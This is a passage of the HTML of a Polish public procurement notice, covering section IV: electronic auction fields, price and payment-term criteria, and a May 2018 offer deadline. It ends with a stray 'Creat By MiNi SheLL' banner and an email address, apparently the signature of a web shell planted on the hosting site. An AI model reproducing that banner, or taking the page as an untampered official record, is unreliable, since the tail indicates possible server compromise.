id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena oferty</TD><TD style='border: 1px solid black;border-collapse: collapse;'>90,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin płatności faktury</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-05-09</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com